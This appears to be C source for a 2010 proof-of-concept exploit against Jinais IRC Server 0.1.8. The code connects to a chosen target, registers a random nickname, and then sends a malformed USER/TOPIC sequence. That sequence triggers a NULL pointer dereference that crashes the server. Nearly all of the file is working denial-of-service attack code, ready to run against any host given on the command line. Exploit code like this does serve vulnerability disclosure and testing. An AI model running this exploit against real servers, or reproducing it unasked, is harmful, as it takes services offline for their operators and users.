258 lines
No EOL
5.1 KiB
C
258 lines
No EOL
5.1 KiB
C
/*
|
|
|
|
Jinais IRC Server 0.1.8 - NULL Pointer PoC
|
|
|
|
This PoC will disconnect the affected target IRC server using
|
|
a NULL Pointer vulnerability.
|
|
|
|
Copyright 2010 Salvatore Fresta aka Drosophila
|
|
|
|
This program is free software; you can redistribute it and/or
|
|
modify it under the terms of the GNU General Public License
|
|
as published by the Free Software Foundation; either version
|
|
2 of the License, or (at your option) any later version.
|
|
|
|
This program is distributed in the hope that it will be
|
|
useful, but WITHOUT ANY WARRANTY; without even the implied
|
|
warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR
|
|
PURPOSE. See the GNU General Public License for more details.
|
|
|
|
You should have received a copy of the GNU General Public
|
|
License along with this program; if not, write to the Free
|
|
Software Foundation,Inc., 59 Temple Place, Suite 330, Boston,
|
|
MA 02111-1307 USA
|
|
|
|
http://www.gnu.org/licenses/gpl-2.0.txt
|
|
|
|
*/
|
|
|
|
#include <stdio.h>
|
|
#include <string.h>
|
|
#include <getopt.h>
|
|
#include <stdlib.h>
|
|
#include <time.h>
|
|
#ifdef WIN32
|
|
#include <winsock.h>
|
|
#define close closesocket
|
|
#else
|
|
#include <sys/types.h>
|
|
#include <sys/socket.h>
|
|
#include <netinet/in.h>
|
|
#include <unistd.h>
|
|
#include <errno.h>
|
|
#include <netdb.h>
|
|
#endif
|
|
|
|
#define BUFF_SIZE 256
|
|
#define DEFAULT_PORT 4002
|
|
|
|
|
|
int socket_connect(char *server, int port);
|
|
char *socket_receive(int sock, int tout);
|
|
int socket_send(int socket, char *buffer, size_t size);
|
|
int socket_close(int socket);
|
|
|
|
|
|
|
|
int main(int argc, char *argv[]) {
|
|
|
|
int sd,
|
|
rnd_num,
|
|
len,
|
|
port = DEFAULT_PORT;
|
|
char pkg[BUFF_SIZE],
|
|
*response = NULL,
|
|
*host = NULL;
|
|
|
|
if(argc < 2) {
|
|
printf("\nJinais IRC Server 0.1.8 NULL Pointer PoC - (c) Salvatore Fresta"
|
|
"\nhttp://www.salvatorefresta.net"
|
|
"\n"
|
|
"\nUsage: %s <target_hostname> <port> (default: %d)\n\n", argv[0], port);
|
|
return -1;
|
|
}
|
|
|
|
srand(time(NULL));
|
|
|
|
host = argv[1];
|
|
if(argc > 2) port = atoi(argv[2]);
|
|
|
|
printf("\nJinais IRC Server 0.1.8 NULL Pointer PoC - (c) Salvatore Fresta"
|
|
"\nhttp://www.salvatorefresta.net"
|
|
"\n\n[*] Connecting to %s:%hu...", host, port);
|
|
|
|
sd = socket_connect(host, port);
|
|
if(sd < 0) {
|
|
printf("\n[-] Error on connect!\n\n");
|
|
return -1;
|
|
}
|
|
|
|
printf("\n[+] Connection estabilished"
|
|
"\n[*] Loggin to IRC server...");
|
|
|
|
login:
|
|
|
|
rnd_num = rand()%100+1;
|
|
|
|
len = snprintf(pkg, sizeof(pkg), "NICK randomnickname%d\r\n", rnd_num);
|
|
if(len < 0 || len > sizeof(pkg)) {
|
|
perror("\n[-] Error: snprintf");
|
|
socket_close(sd);
|
|
return -1;
|
|
}
|
|
|
|
if(socket_send(sd, pkg, len) < 0) {
|
|
perror("\n[-] Error: socket_send");
|
|
socket_close(sd);
|
|
return -1;
|
|
}
|
|
|
|
response = socket_receive(sd, 3);
|
|
if(!response) {
|
|
perror("\n[-] Error: socket_receive");
|
|
socket_close(sd);
|
|
return -1;
|
|
}
|
|
|
|
if(strstr(response, "Nickname is already in use")) {
|
|
free(response);
|
|
goto login;
|
|
}
|
|
free(response);
|
|
|
|
printf("\n[+] Login successfully"
|
|
"\n[*] Data sending...");
|
|
|
|
rnd_num = rand()%100+1;
|
|
len = snprintf(pkg, sizeof(pkg), "USER blabla\r\nTOPIC #ch%d\r\n", rnd_num);
|
|
if(len < 0 || len > sizeof(pkg)) {
|
|
perror("\n[-] Error: snprintf");
|
|
socket_close(sd);
|
|
return -1;
|
|
}
|
|
|
|
if(socket_send(sd, pkg, len) < 0) {
|
|
perror("\n[-] Error: socket_send");
|
|
socket_close(sd);
|
|
return -1;
|
|
}
|
|
|
|
response = socket_receive(sd, 3);
|
|
if(!response) {
|
|
perror("\n[-] Error: socket_receive");
|
|
socket_close(sd);
|
|
return -1;
|
|
}
|
|
|
|
socket_close(sd);
|
|
|
|
printf("\n[+] Data sent successfully"
|
|
"\n[+] Connection closed\n\n");
|
|
|
|
return 0;
|
|
|
|
}
|
|
|
|
|
|
|
|
int socket_connect(char *server, int port) {
|
|
|
|
int sd;
|
|
struct sockaddr_in sock;
|
|
struct hostent *host = NULL;
|
|
|
|
#ifdef WIN32
|
|
WSADATA wsadata;
|
|
if(WSAStartup(MAKEWORD(1,0), &wsadata)) return -1;
|
|
#endif
|
|
|
|
memset(&sock, 0, sizeof(sock));
|
|
|
|
if((sd = socket(AF_INET, SOCK_STREAM, 0)) < 0) return -1;
|
|
|
|
sock.sin_family = AF_INET;
|
|
sock.sin_port = htons(port);
|
|
|
|
if(!(host=gethostbyname(server))) return -1;
|
|
|
|
sock.sin_addr = *((struct in_addr *)host->h_addr);
|
|
|
|
if(connect(sd, (struct sockaddr *) &sock, sizeof(sock)) < 0) return -1;
|
|
|
|
return sd;
|
|
|
|
}
|
|
|
|
|
|
|
|
char *socket_receive(int sock, int tout) {
|
|
|
|
int ret,
|
|
byte_recv,
|
|
oldpkglen = 0,
|
|
pkglen = 0;
|
|
char *buffer = NULL,
|
|
tmp[128];
|
|
struct timeval timeout;
|
|
fd_set input;
|
|
|
|
if(sock < 0) return NULL;
|
|
|
|
while (1) {
|
|
|
|
FD_ZERO(&input);
|
|
FD_SET(sock, &input);
|
|
|
|
if(tout > 0) {
|
|
timeout.tv_sec = tout;
|
|
timeout.tv_usec = 0;
|
|
ret = select(sock + 1, &input, NULL, NULL, &timeout);
|
|
}
|
|
else
|
|
ret = select(sock + 1, &input, NULL, NULL, NULL);
|
|
|
|
if (!ret) break;
|
|
if (ret < 0) return NULL;
|
|
|
|
byte_recv = recv(sock, tmp, sizeof(tmp), 0);
|
|
|
|
if(byte_recv < 0) return NULL;
|
|
|
|
if(!byte_recv) break;
|
|
|
|
oldpkglen = pkglen;
|
|
pkglen += byte_recv;
|
|
|
|
buffer = (char *) realloc(buffer, pkglen+1);
|
|
|
|
if(!buffer) return NULL;
|
|
|
|
memcpy(buffer+oldpkglen, tmp, byte_recv);
|
|
|
|
}
|
|
|
|
if(buffer) buffer[pkglen] = 0;
|
|
|
|
return buffer;
|
|
|
|
}
|
|
|
|
|
|
|
|
int socket_send(int socket, char *buffer, size_t size) {
|
|
|
|
if(socket < 0) return -1;
|
|
|
|
return send(socket, buffer, size, 0) < 0 ? -1 : 0;
|
|
|
|
}
|
|
|
|
|
|
|
|
int socket_close(int socket) {
|
|
|
|
if(socket < 0) return -1;
|
|
|
|
return close(socket) < 0 ? -1 : 0;
|
|
|
|
} |